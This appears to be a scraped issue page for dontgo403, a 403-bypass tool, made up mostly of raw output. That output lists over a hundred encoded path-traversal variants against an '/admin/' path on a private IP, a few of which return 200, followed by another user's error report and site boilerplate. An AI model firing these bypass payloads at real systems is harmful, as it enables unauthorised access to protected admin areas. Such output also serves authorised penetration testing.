404 	  373 bytes http://172.16.67.124/;%09..;admin/
404 	  372 bytes http://172.16.67.124/;%2f..admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/;%2f%2e%2eadmin/
404 	  377 bytes http://172.16.67.124/;%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  375 bytes http://172.16.67.124/;%2f%2f/../admin/
404 	  370 bytes http://172.16.67.124//x/../;/admin/
404 	  376 bytes http://172.16.67.124//..;%2f..;%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//..%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f..%2fadmin/
403 	  372 bytes http://172.16.67.124//./admin/
404 	  376 bytes http://172.16.67.124/;%2f..//;/admin/
404 	  370 bytes http://172.16.67.124//x/;/../admin/
404 	  376 bytes http://172.16.67.124//x/;/..;/admin/
403 	  372 bytes http://172.16.67.124/////admin/
404 	  378 bytes http://172.16.67.124/;%2f../;/;/;admin/
404 	  375 bytes http://172.16.67.124/;%2f/%2f../admin/
404 	  370 bytes http://172.16.67.124///;/admin/
403 	  372 bytes http://172.16.67.124//.//admin/
404 	  378 bytes http://172.16.67.124//..;/;/..;/admin/
404 	  372 bytes http://172.16.67.124//..;//admin/
404 	  376 bytes http://172.16.67.124//..;//..;/admin/
404 	  372 bytes http://172.16.67.124////..;/admin/
404 	  370 bytes http://172.16.67.124//;/admin/
404 	  372 bytes http://172.16.67.124/;%09..admin/
403 	  372 bytes http://172.16.67.124//x/../admin/
404 	  371 bytes http://172.16.67.124//;x/admin/
404 	  374 bytes http://172.16.67.124//x//..;/admin/
404 	  374 bytes http://172.16.67.124//x/..;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/..%2fadmin/
404 	  374 bytes http://172.16.67.124/;%2f..%2f/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f..%2f%2fadmin/
403 	  372 bytes http://172.16.67.124//x/..//admin/
404 	  377 bytes http://172.16.67.124/;%2f..//;/;admin/
404 	  376 bytes http://172.16.67.124//x/..;/;/admin/
404 	  375 bytes http://172.16.67.124/;%2f..///admin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//../admin/
404 	  376 bytes http://172.16.67.124/;%2f..;///admin/
404 	  376 bytes http://172.16.67.124/;%2f../;//admin/
404 	  377 bytes http://172.16.67.124/;%2f../;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f..///;admin/
404 	  375 bytes http://172.16.67.124/;%2f//..%2fadmin/
404 	  370 bytes http://172.16.67.124/;%09admin/
404 	  371 bytes http://172.16.67.124/;%09;admin/
404 	  377 bytes http://172.16.67.124/;%2f/;/..;/admin/
404 	  376 bytes http://172.16.67.124/;%2f/;/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..;//;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..;/;//admin/
404 	  376 bytes http://172.16.67.124/;%2f//..;/admin/
404 	  375 bytes http://172.16.67.124/;%2f//../admin/
404 	  381 bytes http://172.16.67.124//.randomstringadmin/
404 	  371 bytes http://172.16.67.124///..;admin/
404 	  372 bytes http://172.16.67.124/;/%2e%2eadmin/
404 	  378 bytes http://172.16.67.124/;%2f;/;/..;/admin/
404 	  371 bytes http://172.16.67.124//.;/admin/
404 	  374 bytes http://172.16.67.124//..;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f;//../admin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f%2fadmin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f/admin/
404 	  372 bytes http://172.16.67.124/;/%2e.admin/
404 	  369 bytes http://172.16.67.124/;admin/
404 	  372 bytes http://172.16.67.124/;/.%2eadmin/
404 	  375 bytes http://172.16.67.124/;/%2f%2f../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/%2e%2e/admin/
200 	 3427 bytes http://172.16.67.124/???admin/
403 	  372 bytes http://172.16.67.124/;/../.;/../admin/
403 	  372 bytes http://172.16.67.124/;/..//admin/
200 	 3427 bytes http://172.16.67.124/??admin/
200 	 3427 bytes http://172.16.67.124/?admin/
400 	  392 bytes http://172.16.67.124/;/.././../admin/
400 	  392 bytes http://172.16.67.124/;/../../admin/
404 	  375 bytes http://172.16.67.124/;/../%2f/admin/
404 	  371 bytes http://172.16.67.124/;x;admin/
404 	  375 bytes http://172.16.67.124/;/..%2f//admin/
403 	  372 bytes http://172.16.67.124/;/../admin/
403 	  372 bytes http://172.16.67.124/;/../..//admin/
404 	  371 bytes http://172.16.67.124/;x/admin/
404 	  370 bytes http://172.16.67.124/;xadmin/
404 	  376 bytes http://172.16.67.124/;/..%2f..%2fadmin/
404 	  374 bytes http://172.16.67.124/;/..%2f/admin/
404 	  377 bytes http://172.16.67.124/;foo=bar/admin/
404 	  370 bytes http://172.16.67.124/;///../admin/
404 	  370 bytes http://172.16.67.124/;///..//admin/
404 	  372 bytes http://172.16.67.124/;///..admin/
404 	  372 bytes http://172.16.67.124/;//..admin/
403 	  372 bytes http://172.16.67.124/;//../../admin/
404 	  377 bytes http://172.16.67.124/;/.%2e/%2e%2e/%2fadmin/
404 	  373 bytes http://172.16.67.124/;/.;.admin/
404 	  373 bytes http://172.16.67.124/;/..;admin/
404 	  370 bytes http://172.16.67.124/;/../;/admin/
403 	  372 bytes http://172.16.67.124/;/../;/../admin/
404 	  373 bytes http://172.16.67.124/;/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..///admin/
403 	  372 bytes http://172.16.67.124/;/..//../admin/
404 	  375 bytes http://172.16.67.124/;/..//%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..//%2e%2e/admin/
404 	  377 bytes http://172.16.67.124/;/..%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/;/..admin/
404 	  375 bytes http://172.16.67.124/;//%2f../admin/
404 	  374 bytes http://172.16.67.124/\..\.\admin/

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403 	  372 bytes HTTP/1.0
403 	  353 bytes HTTP/1.1
403 	  353 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
2024/03/19 01:59:49 parse "http://172.16.67.124admi%6E/": invalid URL escape "%6E"
 	    0 bytes http://172.16.67.124admi%6E/
2024/03/19 01:59:49 parse "http://172.16.67.124%61dmin/": invalid URL escape "%61"
 	    0 bytes http://172.16.67.124%61dmin/
2024/03/19 01:59:49 parse "http://172.16.67.124a%64min/": invalid URL escape "%64"
 	    0 bytes http://172.16.67.124a%64min/
2024/03/19 01:59:49 parse "http://172.16.67.124ad%6Din/": invalid URL escape "%6D"
 	    0 bytes http://172.16.67.124ad%6Din/
2024/03/19 01:59:49 parse "http://172.16.67.124adm%69n/": invalid URL escape "%69"
 	    0 bytes http://172.16.67.124adm%69n/
2024/03/19 01:59:49 Get "http://172.16.67.124admiN/": dial tcp: lookup 172.16.67.124admiN on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admiN/
2024/03/19 01:59:49 Get "http://172.16.67.124admIn/": dial tcp: lookup 172.16.67.124admIn on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admIn/
2024/03/19 01:59:49 Get "http://172.16.67.124aDmin/": dial tcp: lookup 172.16.67.124aDmin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124aDmin/
2024/03/19 01:59:49 Get "http://172.16.67.124Admin/": dial tcp: lookup 172.16.67.124Admin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124Admin/
2024/03/19 01:59:49 Get "http://172.16.67.124adMin/": dial tcp: lookup 172.16.67.124adMin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124adMin/

Thanks in advance!

` open payloads/httpmethods: no such file or directory` issue

Hi,
When I run the below error occurred.

./dontgo403 -u https://www.target.com/shoppingcart

[####] HTTP METHODS [####]
2022/09/14 23:03:47 open payloads/httpmethods: no such file or directory

[####] CUSTOM PATHS [####]
2022/09/11 13:37:26 parse "https://REDACTED.DOMAIN/admin.php%": invalid URL escape "%"

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.

Jobs

Jooble